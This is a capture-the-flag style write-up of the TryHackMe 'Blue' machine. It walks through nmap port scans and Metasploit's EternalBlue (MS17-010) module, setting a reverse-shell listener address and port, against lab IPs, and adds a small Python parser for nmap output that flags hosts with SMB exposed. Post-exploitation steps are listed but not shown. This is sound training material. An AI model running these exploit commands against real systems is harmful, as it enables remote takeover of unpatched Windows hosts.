
[🇺🇸] [WriteUp] - Blue (TryHackMe)

Discover EternalBlue, MS17-010, RCE Vulnerability
Mar 27 2025
Hacking, Windows
Writeup 1

Machine: Blue (TryHackMe)

 

Difficulty Level: ⭐

 

Blue is a machine with a vulnerable SMB service on port 445. EternalBlue, the exploit for the vulnerability addressed in [MS17-010], allows remote code execution.

Summary:

  • Port Scanning
  • Vulnerability Exploitation (MS17-010 / EternalBlue)
  • Remote Shell
  • Privilege Escalation to NT AUTHORITY\SYSTEM
  • Dumping Password Hashes using Hashdump
  • Hash cracking with John the Ripper
  • Flag search

At the end of the writeup I'll give you a summary of the entire machine, in English and Spanish 🥳.

IMPORTANT: You must have a virtual machine or an auditing operating system with root privileges and an Internet connection.

Methodology to be used:

  • Reconnaissance
  • Enumeration
  • Vulnerability search and analysis
  • Exploitation
  • Post-exploitation

What is EternalBlue?

EternalBlue is an exploit that was allegedly developed by the U.S. National Security Agency (NSA). It was stolen and then leaked by "The Shadow Brokers", and was then used to carry out one of the most damaging ransomware attacks in history, known as WannaCry. EternalBlue was designed to exploit a vulnerability registered as CVE-2017-0144, a security flaw in Microsoft's Server Message Block (SMB) protocol. The security patch for this vulnerability, called MS17-010, was released in March 2017. The use of the EternalBlue exploit mainly affected hospitals, police stations and, in general, organizations around the world.

Versions with MS17-010

[Image: CVE Versions]

 

Port Scan - Reconnaissance

Let's start with the reconnaissance phase. Our IP is 10.8.42.68 and the target is 10.10.90.82.

    ping -c 1 10.10.90.82

    nmap -sn 10.10.90.82

    sudo su

    nmap 10.10.90.82 -p- -sV -oN all_ports.nmap -Pn --min-rate 5000

or

    sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.90.82 -oG Escaneo

Output:

[Image: EscaneoBlue.png]

Port 445/tcp (microsoft-ds, Windows 7) is open; this is the port through which the vulnerability is going to be exploited.
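The second scan above writes grepable output to the file Escaneo. As an added example (not part of the original writeup), the parser below reads that format and lists the hosts with 445/tcp open, which are the ones to check for the MS17-010 patch. The sample scan text, the second host and the function names are constructed for illustration.

```python
import re

# Constructed sample of `nmap -oG` output. The port lists and the second
# host (192.0.2.10) are illustrative, not results from the writeup's scan.
SAMPLE_OG = """\
# Nmap scan initiated as: nmap -p- --open -sS --min-rate 5000 -n -Pn -oG Escaneo
Host: 10.10.90.82 ()\tStatus: Up
Host: 10.10.90.82 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (65531)
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///
# Nmap done
"""

# One port entry is: port/state/protocol/owner/service/rpcinfo/version/
# nmap replaces "/" inside version text with "|", so this pattern is safe
# even when the scan was run with -sV.
PORT_RE = re.compile(r"(\d+)/([a-z|]+)/(tcp|udp|sctp)/[^/]*/([^/]*)/")


def parse_grepable(text):
    """Return {host: [(port, protocol, service), ...]} for open ports only."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip "# Nmap ..." comment lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue  # "Status:" and "Ignored State:" carry no ports
            for port, state, proto, service in PORT_RE.findall(field):
                if state == "open":
                    hosts.setdefault(host, []).append((int(port), proto, service))
    return hosts


def smb_exposed(hosts):
    """Hosts with 445/tcp open: the ones to check for the MS17-010 patch."""
    return sorted(
        host for host, ports in hosts.items()
        if any(port == 445 and proto == "tcp" for port, proto, _ in ports)
    )


if __name__ == "__main__":
    inventory = parse_grepable(SAMPLE_OG)
    for host in smb_exposed(inventory):
        print(host, "exposes SMB; open ports:", [p for p, _, _ in inventory[host]])
```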

 

Vulnerability Exploitation

    msfconsole

    > search ms17-010

or

    > search eternalblue

    > use exploit/windows/smb/ms17_010_eternalblue

or

    > use 0

    > show options

[Image: showoptions]

    > set RHOSTS 10.10.90.82
    > set LPORT 65000
    > set LHOST 10.8.42.68

    > run

[Image: runBlue]

[Image: blueHelp]

    > search ms17-010

 

Later on I will show how to perform penetration tests on different systems in your lab.

 
